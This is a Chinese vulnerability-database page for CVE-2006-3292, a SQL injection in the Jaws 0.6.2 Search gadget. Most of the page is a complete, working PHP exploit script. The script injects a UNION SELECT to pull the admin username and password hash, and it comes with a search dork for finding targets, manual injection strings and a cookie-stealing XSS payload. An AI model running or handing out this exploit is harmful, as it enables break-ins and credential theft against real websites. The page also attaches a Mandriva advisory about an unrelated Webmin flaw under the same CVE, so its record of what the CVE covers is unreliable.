CVE-2006-3292
CVSS7.5
发布时间 :2006-06-28 19:05:00
修订时间 :2011-03-07 21:38:17
NMCOEP    

[原文]SQL injection vulnerability in the Search gadget in Jaws 0.6.2 allows remote attackers to execute arbitrary SQL commands via queries with the "LIKE" keyword in the searchdata parameter (search field).


[CNNVD]Jaws Search Gadget SQL注入漏洞(CNNVD-200606-580)

        Jaws 0.6.2的Search gadget中的SQL注入漏洞。远程攻击者通过searchdata参数(搜索字段)中具有"LIKE"关键字的查询执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3292
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-580
(官方数据源) CNNVD

- 其它链接及资源

http://www.jaws-project.com/index.php?blog/show/29
(PATCH)  CONFIRM  http://www.jaws-project.com/index.php?blog/show/29
http://xforce.iss.net/xforce/xfdb/27334
(UNKNOWN)  XF  jaws-search-gadget-sql-injection(27334)
http://www.vupen.com/english/advisories/2006/2546
(UNKNOWN)  VUPEN  ADV-2006-2546
http://www.securityfocus.com/bid/18665
(UNKNOWN)  BID  18665
http://www.securityfocus.com/archive/1/archive/1/438434/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060626 Jaws <= 0.6.2 'Search gadget' SQL injection
http://secunia.com/advisories/20842
(VENDOR_ADVISORY)  SECUNIA  20842
http://retrogod.altervista.org/JAWS_062_sql.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/JAWS_062_sql.html
http://securityreason.com/securityalert/1165
(UNKNOWN)  SREASON  1165

- 漏洞信息

Jaws Search Gadget SQL注入漏洞
高危 SQL注入
2006-06-28 00:00:00 2006-06-30 00:00:00
远程  
        Jaws 0.6.2的Search gadget中的SQL注入漏洞。远程攻击者通过searchdata参数(搜索字段)中具有"LIKE"关键字的查询执行任意SQL命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1946)

Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit (EDBID:1946)
php webapps
2006-06-23 Verified
0 rgod
N/A [点击下载]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to jaws\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from default (no prefix)\r\n";
echo "                try blog_ even\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /jaws/ \r\n";
echo "php ".$argv[0]." localhost /jaws/ -Tblog_\r\n";
die;
}

# software site: http://www.jaws-project.com/
# manual exploitation:
#
# i)sql injection:
#   go to http://[target]/[path_to_jaws]/?gadget=Search
#   if search module is enabled, in search field type:
#
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/users/**/WHERE/**/id=1/*
#
#   or
@
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/blog_users/**/WHERE/**/id=1/*
#
#   now at screen you have admin username & password hash
#   this works with magic_quotes_gpc both on & off
#
# ii)xss:
#    http://[target]/[path_to_jaws]/gadgets/RssReader/extras/magpierss/scripts/magpie_slashbox.php?rss_url=<script>alert(document.cookie)</script>


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$sql="1%')/**/UNION/**/SELECT/**/0,CONCAT('*SUNTZU*',passwd,'*SUNTZU*'),CONCAT('*SUNTZOI*',username,'*SUNTZOI*'),0,0/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
$sql=urlencode($sql);
$data="gadget=Search";
$data.="&action=Results";
$data.="&gadgets=All";
$data.="&searchdata=".$sql;
$data.="&searchButton=Search";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("Gadget is not enabled",$html))
{
die("search gadget is not enabled... exploit failed");
}
$temp=explode('">*SUNTZOI*',$html);
$temp2=explode('*SUNTZOI*',$temp[1]);
$admin=$temp2[0];
$temp=explode('href="*SUNTZU*',$html);
$temp2=explode('*SUNTZU*',$temp[1]);
$hash=$temp2[0];
if (($admin<>'') and ($hash<>'') and (is_hash($hash)))
{
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$hash."\r\n";
echo "--------------------------------------------------------------------\r\n";
}
else
{
echo "Exploit failed, maybe wrong table prefix...";
}
?>

# milw0rm.com [2006-06-23]
		

- 漏洞信息 (F48408)

Mandriva Linux Security Advisory 2006.125 (PacketStormID:F48408)
2006-07-20 00:00:00
Mandriva  mandriva.com
advisory,remote,arbitrary
linux,mandriva
CVE-2006-3292
[点击下载]

Mandriva Linux Security Advisory MDKSA-2006-125 - Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:125
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : webmin
 Date    : July 18, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 Webmin before 1.290 and Usermin before 1.220 calls the simplify_path
 function before decoding HTML, which allows remote attackers to read
 arbitrary files.  NOTE: This is a different issue than CVE-2006-3274.
 
 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 b389424c7b84f96e37c0db9dcb3e9b01  2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm
 eb4ea546b5d8a4a8401ddba2eee04aea  2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 b389424c7b84f96e37c0db9dcb3e9b01  x86_64/2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm
 eb4ea546b5d8a4a8401ddba2eee04aea  x86_64/2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm

 Corporate 3.0:
 9c95b1373fe69a80ebfe6262921fcc52  corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm
 fc39f0e98dc5dcece871c18f7a1f3e09  corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9c95b1373fe69a80ebfe6262921fcc52  x86_64/corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm
 fc39f0e98dc5dcece871c18f7a1f3e09  x86_64/corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEvVKCmqjQ0CJFipgRAmWyAKDk9ix6E2OrinJ/ShfDTY/FFrcH7wCgyu5Y
jO9m/w0DvTI55SpdrW0HDq0=
=SZvB
-----END PGP SIGNATURE-----

    

- 漏洞信息

26855
Jaws Search Function searchdata Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-26 Unknow
2006-06-26 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站